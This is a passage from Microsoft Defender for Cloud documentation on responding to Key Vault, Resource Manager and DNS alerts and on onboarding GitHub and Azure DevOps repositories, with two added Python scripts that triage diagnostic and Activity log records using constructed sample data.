     permissions. 


Step 3. Measure the impact 


When the event has been mitigated, investigate the secrets in your key vault that were 
affected: 


1. Open the Security page on your Azure key vault and view the triggered alert. 

2. Select the specific alert that was triggered and review the list of the secrets that 
were accessed and the timestamp. 

3. Optionally, if you have key vault diagnostic logs enabled, review the previous 
operations for the corresponding caller IP, user principal, or object ID. 


Step 4. Take action 


When you've compiled your list of the secrets, keys, and certificates that were accessed 
by the suspicious user or application, you should rotate those objects immediately. 


1. Affected secrets should be disabled or deleted from your key vault. 
2. If the credentials were used for a specific application: 
   a. Contact the administrator of the application and ask them to audit their 
      environment for any uses of the compromised credentials since they were 
      compromised. 
   b. If the compromised credentials were used, the application owner should identify 
      the information that was accessed and mitigate the impact. 
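As an added example (not Microsoft's code) of Steps 3 and 4, this Python script takes Key Vault diagnostic records in the AuditEvent shape, keeps the successful operations by the caller IP, user principal, or object ID named in the alert within the alert's time window, and produces the list of secrets, keys, and certificates to rotate. The field names and every sample record are assumptions constructed for the demonstration.

```python
"""Scope a Defender for Key Vault alert using Key Vault diagnostic logs.

Added example; not Microsoft's code. Records are modeled on Key Vault AuditEvent
diagnostic log entries, but the field names are assumptions and every record in
SAMPLE_LOG is constructed for this demonstration.
"""
from __future__ import annotations

import json
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime
from urllib.parse import urlparse

# Constructed AuditEvent-style records (one JSON object per line), not real telemetry.
SAMPLE_LOG = """
{"time":"2023-07-01T09:00:00Z","operationName":"SecretGet","resultSignature":"OK","callerIpAddress":"203.0.113.7","identity":{"claim":{"oid":"oid-0001"}},"properties":{"id":"https://contoso-kv.vault.azure.net/secrets/old-token/1"}}
{"time":"2023-07-01T10:02:11Z","operationName":"SecretGet","resultSignature":"OK","callerIpAddress":"203.0.113.7","identity":{"claim":{"oid":"oid-0001"}},"properties":{"id":"https://contoso-kv.vault.azure.net/secrets/db-conn/7d1"}}
{"time":"2023-07-01T10:02:15Z","operationName":"SecretList","resultSignature":"OK","callerIpAddress":"203.0.113.7","identity":{"claim":{"oid":"oid-0001"}},"properties":{"id":"https://contoso-kv.vault.azure.net/secrets"}}
{"time":"2023-07-01T10:03:40Z","operationName":"KeyGet","resultSignature":"OK","callerIpAddress":"203.0.113.7","identity":{"claim":{"oid":"oid-0001"}},"properties":{"id":"https://contoso-kv.vault.azure.net/keys/signing-key/ab2"}}
{"time":"2023-07-01T10:04:00Z","operationName":"SecretGet","resultSignature":"OK","callerIpAddress":"198.51.100.5","identity":{"claim":{"upn":"alice@contoso.com","oid":"oid-0002"}},"properties":{"id":"https://contoso-kv.vault.azure.net/secrets/api-token/1"}}
{"time":"2023-07-01T10:05:00Z","operationName":"CertificateGet","resultSignature":"Forbidden","callerIpAddress":"203.0.113.7","identity":{"claim":{"oid":"oid-0001"}},"properties":{"id":"https://contoso-kv.vault.azure.net/certificates/tls-cert"}}
{"time":"2023-07-01T10:06:30Z","operationName":"SecretGet","resultSignature":"OK","callerIpAddress":"203.0.113.7","identity":{},"properties":{"id":"https://contoso-kv.vault.azure.net/secrets/db-conn/7d1"}}
"""


@dataclass(frozen=True)
class Suspect:
    """Selectors copied from the alert; a record matches if any one of them matches."""

    caller_ip: str | None = None
    upn: str | None = None
    oid: str | None = None


def parse_audit_events(text: str) -> list[dict]:
    """Parse JSON-lines diagnostic output into event dicts, ignoring blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def _parse_time(value: str) -> datetime:
    # Python < 3.11 does not accept a trailing "Z" in fromisoformat.
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def _matches(event: dict, who: Suspect) -> bool:
    claim = event.get("identity", {}).get("claim", {})
    return any([
        who.caller_ip is not None and event.get("callerIpAddress") == who.caller_ip,
        who.upn is not None and claim.get("upn") == who.upn,
        who.oid is not None and claim.get("oid") == who.oid,
    ])


def _object_ref(event: dict) -> tuple[str, str | None] | None:
    """Split the object URI: .../secrets/db-conn/7d1 -> ("secrets", "db-conn").
    A bare collection URI (.../secrets) yields name None, i.e. a list operation."""
    url = event.get("properties", {}).get("id")
    if not url:
        return None
    parts = [p for p in urlparse(url).path.split("/") if p]
    if not parts or parts[0] not in ("secrets", "keys", "certificates"):
        return None
    return parts[0], (parts[1] if len(parts) > 1 else None)


def scope_alert(events: list[dict], who: Suspect, since: str, until: str) -> dict:
    """Step 3: what the suspect touched in the window around the alert.
    Successful operations on named objects go under "accessed", collection
    listings under "listed"; denied attempts are only counted in "failed"."""
    lo, hi = _parse_time(since), _parse_time(until)
    accessed: dict[str, set[str]] = defaultdict(set)
    listed: set[str] = set()
    failed = 0
    for event in events:
        if not (lo <= _parse_time(event["time"]) <= hi) or not _matches(event, who):
            continue
        if event.get("resultSignature") != "OK":
            failed += 1
            continue
        ref = _object_ref(event)
        if ref is None:  # vault-level operations carry no object path
            continue
        kind, name = ref
        if name is None:
            listed.add(kind)
        else:
            accessed[kind].add(name)
    return {
        "accessed": {k: sorted(v) for k, v in sorted(accessed.items())},
        "listed": sorted(listed),
        "failed": failed,
    }


def rotation_list(scope: dict) -> list[str]:
    """Step 4 input: every object the suspect read must be rotated or disabled."""
    return [f"{kind}/{name}" for kind, names in scope["accessed"].items() for name in names]
```

The denied attempt against tls-cert is kept as a count rather than dropped, because failed reads still show what the caller was looking for.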


Next steps 
In this article, you learned about Microsoft Defender for Key Vault. 
For related material, see the following articles: 


• Key Vault security alerts - The Key Vault section of the reference table for all 
  Microsoft Defender for Cloud alerts 
• Continuously export Defender for Cloud data 
• Suppress security alerts 


Overview of Microsoft Defender for Resource Manager 


Article • 08/03/2023 


Azure Resource Manager is the deployment and management service for Azure. It 
provides a management layer that enables you to create, update, and delete resources 
in your Azure account. You use management features, like access control, locks, and 
tags, to secure and organize your resources after deployment. 


The cloud management layer is a crucial service connected to all your cloud resources. 
Because of this, it is also a potential target for attackers. Consequently, we recommend 
security operations teams monitor the resource management layer closely. 


Microsoft Defender for Resource Manager automatically monitors the resource 
management operations in your organization, whether they're performed through the 
Azure portal, Azure REST APIs, Azure CLI, or other Azure programmatic clients. Defender 
for Cloud runs advanced security analytics to detect threats and alerts you about 
suspicious activity. 


Availability 


Aspect          Details 
Release state:  General availability (GA) 
Pricing:        Microsoft Defender for Resource Manager is billed as shown on the pricing page 
Clouds:         ✔ Commercial clouds 
                ✔ Azure Government 
                ✔ Microsoft Azure operated by 21Vianet 


What are the benefits of Microsoft Defender for Resource Manager? 


Microsoft Defender for Resource Manager protects against issues including: 


• Suspicious resource management operations, such as operations from malicious 
  IP addresses, disabling antimalware, and suspicious scripts running in VM 
  extensions 

• Use of exploitation toolkits like Microburst or PowerZure 

• Lateral movement from the Azure management layer to the Azure resources data 
  plane 

[Diagram: clients (Azure portal, Azure PowerShell, Azure CLI, REST clients, SDKs) 
authenticate through Azure Resource Manager, which fronts services such as Data Store, 
Web App, Virtual Machine, Service Management, and other services.] 


A full list of the alerts provided by Microsoft Defender for Resource Manager is on the 
alerts reference page. 


Next steps 


In this article, you learned about Microsoft Defender for Resource Manager. 


Enable enhanced protections 


For related material, see the following article: 


• Security alerts might be generated or received by Defender for Cloud from 
  different security products. To export all of these alerts to Microsoft Sentinel, any 
  third-party SIEM, or any other external tool, follow the instructions in Exporting 
  alerts to a SIEM solution. 


Protect your resources with Defender for Resource Manager 

Azure Resource Manager is the deployment and management service for Azure. It 
provides a management layer that enables you to create, update, and delete resources 
in your Azure account. You use management features, like access control, locks, and 
tags, to secure and organize your resources after deployment. 


Microsoft Defender for Resource Manager automatically monitors the resource 
management operations in your organization, whether they're performed through the 
Azure portal, Azure REST APIs, Azure CLI, or other Azure programmatic clients. Defender 
for Cloud runs advanced security analytics to detect threats and alerts you about 
suspicious activity. 


Learn more about Microsoft Defender for Resource Manager. 


You can learn more about Defender for Resource Manager's pricing on the pricing 
page. 


Prerequisites 


• You need a Microsoft Azure subscription. If you don't have an Azure subscription, 
  you can sign up for a free subscription. 

• You must enable Microsoft Defender for Cloud on your Azure subscription. 


Enable the Resource Manager plan 


Microsoft Defender for Resource Manager automatically monitors the resource 
management operations in your organization, whether they're performed through the 
Azure portal, Azure REST APIs, Azure CLI, or other Azure programmatic clients. Defender 
for Cloud runs advanced security analytics to detect threats and alerts you about 
suspicious activity. 


To enable the Defender for Resource Manager plan on your subscription: 

1. Sign in to the Azure portal. 
2. Search for and select Microsoft Defender for Cloud. 
3. In the Defender for Cloud menu, select Environment settings. 
4. Select the relevant subscription. 
5. On the Defender plans page, toggle the Resource Manager plan to On. 

[Screenshot: Environment settings > Defender plans page. The page notes that when you 
select Save, Microsoft Defender for Cloud's enhanced security features will be enabled 
on all the resource types you've selected, that the first 30 days are free, and that 
more information is on the Defender for Cloud pricing page.] 


6. Select Save. 


Next steps 


Overview of Microsoft Defender for Resource Manager 


Respond to Microsoft Defender for Resource Manager alerts 

When you receive an alert from Microsoft Defender for Resource Manager, we 
recommend you investigate and respond to the alert as described below. Defender for 
Resource Manager protects all connected resources, so even if you're familiar with the 
application or user that triggered the alert, it's important to verify the situation 
surrounding every alert. 


Step 1: Contact 


1. Contact the resource owner to determine whether the behavior was expected or 
intentional. 

2. If the activity is expected, dismiss the alert. 

3. If the activity is unexpected, treat the related user accounts, subscriptions, and 
virtual machines as compromised and mitigate as described in the following step. 


Step 2: Investigate alerts from Microsoft Defender for Resource Manager 


Security alerts from Defender for Resource Manager are based on threats detected by 
monitoring Azure Resource Manager operations. Defender for Cloud uses internal log 
sources of Azure Resource Manager as well as Azure Activity log, a platform log in Azure 
that provides insight into subscription-level events. 


Defender for Resource Manager provides visibility into activity that comes from third 
party service providers that have delegated access as part of the resource manager 
alerts. For example, Azure Resource Manager operation from suspicious proxy IP 
address - delegated access. 

Delegated access refers to access with Azure Lighthouse or with Delegated 
administration privileges. 

Alerts that show Delegated access also include a customized description and 
remediation steps. 


Learn more about Azure Activity log. 


To investigate security alerts from Defender for Resource Manager: 


1. Open Azure Activity log. 


[Screenshot: searching for "Activity log" in the Azure portal search box, which lists 
Activity log under Services.] 


2. Filter the events to: 


• The subscription mentioned in the alert 
• The timeframe of the detected activity 
• The related user account (if relevant) 


3. Look for suspicious activities. 


Tip 


For a better, richer investigation experience, stream your Azure activity logs to 
Microsoft Sentinel as described in Connect data from Azure Activity log. 


Step 3: Immediate mitigation 

1. Remediate compromised user accounts: 
   • If they're unfamiliar, delete them as they may have been created by a threat 
     actor 
   • If they're familiar, change their authentication credentials 
   • Use Azure Activity Logs to review all activities performed by the user and 
     identify any that are suspicious 

2. Remediate compromised subscriptions: 
   • Remove any unfamiliar Runbooks from the compromised automation 
     account 
   • Review IAM permissions for the subscription and remove permissions for any 
     unfamiliar user account 
   • Review all Azure resources in the subscription and delete any that are 
     unfamiliar 
   • Review and investigate any security alerts for the subscription in Microsoft 
     Defender for Cloud 
   • Use Azure Activity Logs to review all activities performed in the subscription 
     and identify any that are suspicious 

3. Remediate the compromised virtual machines: 
   • Change the passwords for all users 
   • Run a full antimalware scan on the machine 
   • Reimage the machines from a malware-free source 
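As an added example (not Microsoft's code) of Steps 2 and 3, this Python script applies the alert's filters to Activity log events (subscription, timeframe, and optionally the caller) and flags the control-plane operations the mitigation list is concerned with: role assignments, runbooks, and VM extensions. The event shape, the watchlist descriptions, and every sample event are assumptions constructed for the demonstration.

```python
"""Triage Azure Activity log events behind a Defender for Resource Manager alert.

Added example; not Microsoft's code. Events are modeled on Azure Activity log
records, but the field names are assumptions (operationName is simplified to a
plain string) and SAMPLE_ACTIVITY is constructed for this demonstration.
"""
from __future__ import annotations

import json
from collections import Counter
from datetime import datetime

# Control-plane operations that deserve a close look. The descriptions are
# illustrative and map to the mitigation list (IAM changes, runbooks, VM extensions).
WATCHLIST = {
    "Microsoft.Authorization/roleAssignments/write": "role assignment granted",
    "Microsoft.Authorization/roleAssignments/delete": "role assignment removed",
    "Microsoft.Automation/automationAccounts/runbooks/write": "runbook created or changed",
    "Microsoft.Compute/virtualMachines/extensions/write": "VM extension deployed (can run scripts)",
    "Microsoft.Compute/virtualMachines/extensions/delete": "VM extension removed (for example antimalware)",
}

# Constructed events, one JSON object per line; not real telemetry.
SAMPLE_ACTIVITY = """
{"eventTimestamp":"2023-08-01T13:30:00Z","caller":"unknown.user@contoso.com","subscriptionId":"sub-aaaa","operationName":"Microsoft.Authorization/roleAssignments/write","status":"Succeeded","resourceId":"/subscriptions/sub-aaaa/providers/Microsoft.Authorization/roleAssignments/ra-0","clientIpAddress":"203.0.113.9"}
{"eventTimestamp":"2023-08-01T14:00:00Z","caller":"svc-deploy@contoso.com","subscriptionId":"sub-aaaa","operationName":"Microsoft.Compute/virtualMachines/write","status":"Succeeded","resourceId":"/subscriptions/sub-aaaa/resourceGroups/rg-prod/providers/Microsoft.Compute/virtualMachines/web01","clientIpAddress":"198.51.100.20"}
{"eventTimestamp":"2023-08-01T14:05:10Z","caller":"unknown.user@contoso.com","subscriptionId":"sub-aaaa","operationName":"Microsoft.Authorization/roleAssignments/write","status":"Succeeded","resourceId":"/subscriptions/sub-aaaa/providers/Microsoft.Authorization/roleAssignments/ra-1","clientIpAddress":"203.0.113.9"}
{"eventTimestamp":"2023-08-01T14:07:42Z","caller":"unknown.user@contoso.com","subscriptionId":"sub-aaaa","operationName":"Microsoft.Automation/automationAccounts/runbooks/write","status":"Succeeded","resourceId":"/subscriptions/sub-aaaa/resourceGroups/rg-ops/providers/Microsoft.Automation/automationAccounts/ops-auto/runbooks/sync","clientIpAddress":"203.0.113.9"}
{"eventTimestamp":"2023-08-01T14:09:05Z","caller":"unknown.user@contoso.com","subscriptionId":"sub-aaaa","operationName":"Microsoft.Compute/virtualMachines/extensions/write","status":"Succeeded","resourceId":"/subscriptions/sub-aaaa/resourceGroups/rg-prod/providers/Microsoft.Compute/virtualMachines/web01/extensions/CustomScript","clientIpAddress":"203.0.113.9"}
{"eventTimestamp":"2023-08-01T14:12:00Z","caller":"unknown.user@contoso.com","subscriptionId":"sub-bbbb","operationName":"Microsoft.Authorization/roleAssignments/write","status":"Succeeded","resourceId":"/subscriptions/sub-bbbb/providers/Microsoft.Authorization/roleAssignments/ra-2","clientIpAddress":"203.0.113.9"}
{"eventTimestamp":"2023-08-01T14:15:00Z","caller":"unknown.user@contoso.com","subscriptionId":"sub-aaaa","operationName":"Microsoft.Compute/virtualMachines/extensions/delete","status":"Failed","resourceId":"/subscriptions/sub-aaaa/resourceGroups/rg-prod/providers/Microsoft.Compute/virtualMachines/web01/extensions/IaaSAntimalware","clientIpAddress":"203.0.113.9"}
"""


def parse_activity(text: str) -> list[dict]:
    """Parse JSON-lines export into event dicts, ignoring blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def _parse_time(value: str) -> datetime:
    # Python < 3.11 does not accept a trailing "Z" in fromisoformat.
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def triage(events: list[dict], subscription_id: str, since: str, until: str,
           caller: str | None = None) -> dict:
    """Step 2: apply the alert's filters (subscription, timeframe, optional user)
    and pull out watchlisted control-plane operations. Failed attempts are kept,
    since a denied extension removal is still worth asking the owner about."""
    lo, hi = _parse_time(since), _parse_time(until)
    flagged, callers, ips = [], Counter(), set()
    for event in events:
        if event.get("subscriptionId") != subscription_id:
            continue
        if not (lo <= _parse_time(event["eventTimestamp"]) <= hi):
            continue
        if caller is not None and event.get("caller") != caller:
            continue
        callers[event.get("caller")] += 1
        if event.get("clientIpAddress"):
            ips.add(event["clientIpAddress"])
        op = event.get("operationName", "")
        if op in WATCHLIST:
            flagged.append({
                "time": event["eventTimestamp"],
                "caller": event.get("caller"),
                "operation": op,
                "status": event.get("status"),
                "resource": event.get("resourceId"),
                "why": WATCHLIST[op],
            })
    return {"flagged": flagged, "callers": dict(callers), "source_ips": sorted(ips)}


def affected_resources(result: dict) -> list[str]:
    """Step 3 scoping: the distinct resources (role assignments, runbooks, VMs)
    behind the flagged operations, to review, remove, or reimage."""
    return sorted({f["resource"] for f in result["flagged"]})
```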


Next steps 


This page explained the process of responding to an alert from Defender for Resource 
Manager. For related information, see the following pages: 


• Overview of Microsoft Defender for Resource Manager 
• Suppress security alerts 
• Continuously export Defender for Cloud data 


Overview of Microsoft Defender for DNS 

Important 

As of August 1, customers with an existing subscription to Defender for DNS can 
continue to use the service, but new subscribers will receive alerts about suspicious 
DNS activity as part of Defender for Servers P2. 

Microsoft Defender for DNS provides an additional layer of protection for resources that 
use Azure DNS's Azure-provided name resolution capability. 

From within Azure DNS, Defender for DNS monitors the queries from these resources 
and detects suspicious activities without the need for any additional agents on your 
resources. 


Availability 


Aspect          Details 
Release state:  General availability (GA) 
Pricing:        Microsoft Defender for DNS is billed as shown on the pricing page 
Clouds:         ✔ Commercial clouds 
                ✔ Microsoft Azure operated by 21Vianet 
                ✔ Azure Government 


What are the benefits of Microsoft Defender for DNS? 


Microsoft Defender for DNS detects suspicious and anomalous activities such as: 


• Data exfiltration from your Azure resources using DNS tunneling 

• Malware communicating with command and control servers 

• DNS attacks - communication with malicious DNS resolvers 

• Communication with domains used for malicious activities such as phishing and 
  crypto mining 

A full list of the alerts provided by Microsoft Defender for DNS is on the alerts reference 
page. 


Dependencies 


Microsoft Defender for DNS doesn't use any agents. 


Next steps 
In this article, you learned about Microsoft Defender for DNS. 
For related material, see the following article: 


Security alerts might be generated by Defender for Cloud or received from other 
security products. To export all of these alerts to Microsoft Sentinel, any third-party 
SIEM, or any other external tool, follow the instructions in Exporting alerts to a SIEM. 


Respond to Microsoft Defender for DNS alerts 

Important 

As of August 1, customers with an existing subscription to Defender for DNS can 
continue to use the service, but new subscribers will receive alerts about suspicious 
DNS activity as part of Defender for Servers P2. 


When you receive a security alert about suspicious and anomalous activities identified in 
DNS transactions, we recommend you investigate and respond to the alert as described 
below. Even if you're familiar with the application or user that triggered the alert, it's 
important to verify the situation surrounding every alert. 


Step 1. Contact 


1. Contact the resource owner to determine whether the behavior was expected or 
intentional. 

2. If the activity is expected, dismiss the alert. 

3. If the activity is unexpected, treat the resource as potentially compromised and 
mitigate as described in the next step. 


Step 2. Immediate mitigation 


1. Isolate the resource from the network to prevent lateral movement. 

2. Run a full antimalware scan on the resource, following any resulting remediation 
advice. 

3. Review installed and running software on the resource, removing any unknown or 
unwanted packages. 

4. Revert the machine to a known good state, reinstalling the operating system if 
required, and restore software from a verified malware-free source. 

5. Resolve any Microsoft Defender for Cloud recommendations for the machine, 
remediating highlighted security issues to prevent future breaches. 


Next steps 


Now that you know how to respond to DNS alerts, find out more about how to manage 
alerts. 


Manage security alerts 


For related material, see the following articles: 


• To export Defender for Cloud alerts to your centralized security information and 
  event management (SIEM) system, such as Microsoft Sentinel, any third-party 
  SIEM, or any other external tool. 

• To send alerts in real-time to Log Analytics or Event Hubs to create automated 
  processes to analyze and respond to security alerts. 


Overview of Defender for DevOps 

Important 

Microsoft Defender for DevOps is constantly making changes and updates that 
require Defender for DevOps customers who have onboarded their GitHub 
environments in Defender for Cloud to provide permissions as part of the 
application deployed in their GitHub organization. These permissions are necessary 
to ensure all of the security features of Defender for DevOps operate normally and 
without issues. 

Please see the recent release note for instructions on how to add these additional 
permissions. 


Microsoft Defender for Cloud enables comprehensive visibility, posture management, 
and threat protection across multicloud environments including Azure, AWS, GCP, and 
on-premises resources. Defender for DevOps, a service available in Defender for Cloud, 
empowers security teams to manage DevOps security across multi-pipeline 
environments. 


Defender for DevOps uses a central console to empower security teams with the ability 
to protect applications and resources from code to cloud across multi-pipeline 
environments, such as GitHub and Azure DevOps. Findings from Defender for DevOps 
can then be correlated with other contextual cloud security insights to prioritize 
remediation in code. Key capabilities in Defender for DevOps include: 


• Unified visibility into DevOps security posture: Security administrators now have 
  full visibility into DevOps inventory and the security posture of pre-production 
  application code, which includes findings from code, secret, and open-source 
  dependency vulnerability scans. They can configure their DevOps resources across 
  multi-pipeline and multicloud environments in a single view. 

• Strengthen cloud resource configurations throughout the development lifecycle: 
  You can enable security of Infrastructure as Code (IaC) templates and container 
  images to minimize cloud misconfigurations reaching production environments, 
  allowing security administrators to focus on any critical evolving threats. 

• Prioritize remediation of critical issues in code: Apply comprehensive code to 
  cloud contextual insights within Defender for Cloud. Security admins can help 
  developers prioritize critical code fixes with Pull Request annotations and assign 
  developer ownership by triggering custom workflows feeding directly into the 
  tools developers use and love. 


Defender for DevOps helps unify, strengthen and manage multi-pipeline DevOps 
security. 


Availability 


Aspect                          Details 
Release state:                  Preview. The Azure Preview Supplemental Terms include other 
                                legal terms that apply to Azure features that are in beta, 
                                preview, or otherwise not yet released into general availability. 
Clouds:                         ✔ Commercial clouds 
                                ✘ National (Azure Government, Microsoft Azure operated by 21Vianet) 
Regions:                        Australia East, Central US, West Europe 
Source Code Management Systems: Azure DevOps 
                                GitHub supported versions: GitHub Free, Pro, Team, and GitHub 
                                Enterprise Cloud 
Required permissions:           Azure account - with permissions to sign into Azure portal. 
                                Contributor - on the relevant Azure subscription. 
                                Organization Administrator - in GitHub. 
                                Security Admin role - in Defender for Cloud. 


Manage your DevOps environments in Defender for Cloud 

Defender for DevOps allows you to manage your connected environments and provides 
your security teams with a high level overview of discovered issues that may exist within 
them through the Defender for DevOps console. 

Here, you can add GitHub and Azure DevOps environments, customize DevOps 
workbooks to show your desired metrics, view our guides and give feedback, and 
configure your pull request annotations. 


Understanding your DevOps security 


Security Overview 

The security overview section of the page: 

• Shows the total number of vulnerabilities found by Defender for DevOps. You can 
  organize the results by severity level. 
• Presents the total number of findings by scan type and the associated 
  recommendations for any onboarded resources. Selecting a result takes you to 
  corresponding recommendations. 

Review your findings 

The lower half of the page allows you to review onboarded DevOps resources and the 
security information related to them. 

On this part of the screen you see: 


• Repositories - Lists onboarded repositories from GitHub and Azure DevOps. View 
  more information about a specific resource by selecting it. 

• Pull request annotation status - Shows whether PR annotations are enabled for 
  the repository. 
  ○ On - PR annotations are enabled. 
  ○ Off - PR annotations aren't enabled. 
  ○ NA - Defender for Cloud doesn't have information about enablement. 

  Note 

  Currently, this information is available only for Azure DevOps repositories. 

• Exposed secrets - Shows the number of secrets identified in the repositories. 

• OSS vulnerabilities - Shows the number of open source dependency 
  vulnerabilities identified in the repositories. 

  Note 

  Currently, this information is available only for GitHub repositories. 

• IaC scanning findings - Shows the number of infrastructure as code 
  misconfigurations identified in the repositories. 

• Code scanning findings - Shows the number of code vulnerabilities and 
  misconfigurations identified in the repositories. 


Learn more 

• You can learn more about DevOps from our DevOps resource center. 
• Learn about security in DevOps. 
• You can learn about securing Azure Pipelines. 
• Learn about security hardening practices for GitHub Actions. 


Next steps 


Configure the Microsoft Security DevOps GitHub action. 


Configure the Microsoft Security DevOps Azure DevOps extension 


Improve DevOps security posture 

With an increase of cyber attacks on source code management systems and continuous 
integration/continuous delivery pipelines, securing DevOps platforms against the 
diverse range of threats identified in the DevOps Threat Matrix is crucial. Such cyber 
attacks can enable code injection, privilege escalation, and data exfiltration, potentially 
leading to extensive impact. 


DevOps posture management is a feature in Microsoft Defender for Cloud that: 


• Provides insights into the security posture of the entire software supply chain 
  lifecycle. 
• Uses advanced scanners for in-depth assessments. 
• Covers various resources, including organizations, pipelines, and repositories. 
• Allows customers to reduce their attack surface by uncovering and acting on the 
  provided recommendations. 


DevOps scanners 


To provide findings, DevOps posture management uses DevOps scanners to identify 
weaknesses in source code management and continuous integration/continuous 
delivery pipelines by running checks against the security configurations and access 
controls. 


Azure DevOps and GitHub scanners are used internally within Microsoft to identify risks 
associated with DevOps resources, reducing attack surface and strengthening corporate 
DevOps systems. 


Once a DevOps environment is connected, Defender for Cloud autoconfigures these 
scanners to conduct recurring scans every eight hours across multiple DevOps 
resources, including: 


• Builds 
• Secure Files 
• Variable Groups 
• Service Connections 
• Organizations 
• Repositories 


DevOps threat matrix risk reduction 


DevOps posture management assists organizations in discovering and remediating 
harmful misconfigurations in the DevOps platform. This leads to a resilient, zero-trust 
DevOps environment, which is strengthened against a range of threats defined in the 
DevOps threat matrix. The primary posture management controls include: 


• Scoped secret access: Minimize the exposure of sensitive information and reduce 
  the risk of unauthorized access, data leaks, and lateral movements by ensuring 
  each pipeline only has access to the secrets essential to its function. 

• Restriction of self-hosted runners and high permissions: Prevent unauthorized 
  executions and potential escalations by avoiding self-hosted runners and ensuring 
  that pipeline permissions default to read-only. 

• Enhanced branch protection: Maintain the integrity of the code by enforcing 
  branch protection rules and preventing malicious code injections. 

• Optimized permissions and secure repositories: Reduce the risk of unauthorized 
  access and modifications by tracking minimum base permissions and enabling 
  secret push protection for repositories. 

• Learn more about the DevOps threat matrix. 


DevOps posture management 
recommendations 


When the DevOps scanners uncover deviations from security best practices within 
source code management systems and continuous integration/continuous delivery 
pipelines, Defender for Cloud outputs precise and actionable recommendations. These 
recommendations have the following benefits: 


• Enhanced visibility: Obtain comprehensive insights into the security posture of 
  DevOps environments, ensuring a well-rounded understanding of any existing 
  vulnerabilities. Identify missing branch protection rules, privilege escalation risks, 
  and insecure connections to prevent attacks. 

• Priority-based action: Filter results by severity to spend resources and efforts more 
  effectively by addressing the most critical vulnerabilities first. 

• Attack surface reduction: Address highlighted security gaps to significantly 
  minimize vulnerable attack surfaces, thereby hardening defenses against potential 
  threats. 

• Real-time notifications: Ability to integrate with workflow automations to receive 
  immediate alerts when secure configurations alter, allowing for prompt action and 
  ensuring sustained compliance with security protocols. 


Next steps 


• Connect your GitHub repositories to Microsoft Defender for Cloud. 
• Connect your Azure DevOps repositories to Microsoft Defender for Cloud. 


Quickstart: Connect your GitHub repositories to Microsoft Defender for Cloud 

Cloud workloads commonly span multiple cloud platforms. Cloud security services must 
do the same. Microsoft Defender for Cloud helps protect workloads in Azure, Amazon 
Web Services, Google Cloud Platform, GitHub, and Azure DevOps. 


In this quickstart, you connect your GitHub organizations on the Environment settings 
page in Microsoft Defender for Cloud. This page provides a simple onboarding 
experience (including auto-discovery). 


By connecting your GitHub repositories to Defender for Cloud, you extend the enhanced 
security features of Defender for Cloud to your GitHub resources. These features 
include: 


• Cloud Security Posture Management features: You can assess your GitHub 
resources according to GitHub-specific security recommendations. You can also 
learn about all of the recommendations for DevOps resources. Resources are 
assessed for compliance with built-in standards that are specific to DevOps. The 
Defender for Cloud asset inventory page is a multicloud-enabled feature that helps 
you manage your GitHub resources alongside your Azure resources. 

• Workload protection features: You can extend Defender for Cloud threat 
detection capabilities and advanced defenses to your GitHub resources. 


Prerequisites 


To complete this quickstart, you need: 


• An Azure account with Defender for Cloud onboarded. If you don't already have an 
Azure account, create one for free. 

• GitHub Enterprise with GitHub Advanced Security enabled, so you can use all 
advanced security capabilities that the GitHub connector provides in Defender for 
Cloud. 


Availability 


Aspect                   Details 

Release state:           Preview. The Azure Preview Supplemental Terms include legal terms that 
                         apply to Azure features that are in beta, in preview, or otherwise not yet 
                         released into general availability. 

Pricing:                 For pricing, see the Defender for Cloud pricing page. 

Required permissions:    Account Administrator with permissions to sign in to the Azure portal. 
                         Contributor on the Azure subscription where the connector will be created. 
                         Security Admin in Defender for Cloud. 
                         Organization Administrator in GitHub. 

GitHub supported         GitHub Free, Pro, Team, and Enterprise Cloud 
versions: 

Regions:                 Australia East, Central US, West Europe 

Clouds:                  Commercial: supported. 
                         National (Azure Government, Microsoft Azure operated by 21Vianet): not supported. 


Connect your GitHub account 

To connect your GitHub account to Microsoft Defender for Cloud: 

1. Sign in to the Azure portal. 
2. Go to Microsoft Defender for Cloud > Environment settings. 
3. Select Add environment. 
4. Select GitHub. 

   [Screenshot: the Environment settings page, with the Add environment menu listing 
   Amazon Web Services, Google Cloud Platform, GitHub (preview) and Azure DevOps (preview).] 

5. Enter a name (limit of 20 characters), and then select your subscription, resource 
   group, and region. 

   The subscription is the location where Defender for Cloud creates and stores the 
   GitHub connection. 

6. Select Next: Select plans. 
7. Select Next: Authorize connection. 
8. Select Authorize to grant your Azure subscription access to your GitHub 
   repositories. Sign in, if necessary, with an account that has permissions to the 
   repositories that you want to protect. 

   The authorization automatically signs in by using the session from your browser's 
   tab. After you select Authorize, if you don't see the GitHub organizations that you 
   expect, check whether you're signed in to Microsoft Defender for Cloud on one 
   browser tab and signed in to GitHub on another browser tab. 

   After authorization, if you wait too long to install the DevOps application, the 
   session will time out and you'll get an error message. 

9. Select Install. 
10. Select the repositories to install the GitHub application. This step grants 
    Defender for Cloud access to the selected repositories only. 
11. Select Next: Review and create. 
12. Select Create. 

When the process finishes, the GitHub connector appears on your Environment settings 
page. 
The Defender for Cloud service automatically discovers the repositories that you 
selected and analyzes them for any security problems. Initial repository discovery can 
take up to 10 minutes during the onboarding process. 


When you select auto-discovery during the onboarding process, repositories can take 
up to 4 hours to appear after onboarding is completed. The auto-discovery process 
detects any new repositories and connects them to Defender for Cloud. 


The Inventory page shows your selected repositories. The Recommendations page 
shows any security problems related to a selected repository. This information can take 
3 hours or more to appear. 


Learn more 

• Azure and GitHub integration 
• Security hardening for GitHub Actions 

Next steps 

• Learn about Defender for DevOps. 
• Learn how to configure the Microsoft Security DevOps GitHub action. 
• Learn how to configure pull request annotations in Defender for Cloud. 


Quickstart: Connect your Azure DevOps repositories to Microsoft Defender for Cloud 

Cloud workloads commonly span multiple cloud platforms. Cloud security services must 
do the same. Microsoft Defender for Cloud helps protect workloads in Azure, Amazon 
Web Services, Google Cloud Platform, GitHub, and Azure DevOps. 


In this quickstart, you connect your Azure DevOps organizations on the Environment 
settings page in Microsoft Defender for Cloud. This page provides a simple onboarding 
experience (including auto-discovery). 


By connecting your Azure DevOps repositories to Defender for Cloud, you extend the 
security features of Defender for Cloud to your Azure DevOps resources. These features 
include: 


• Microsoft Defender Cloud Security Posture Management features: You can assess 
your Azure DevOps resources for compliance with Azure DevOps-specific security 
recommendations. You can also learn about all the recommendations for DevOps 
resources. The Defender for Cloud asset inventory page is a multicloud-enabled 
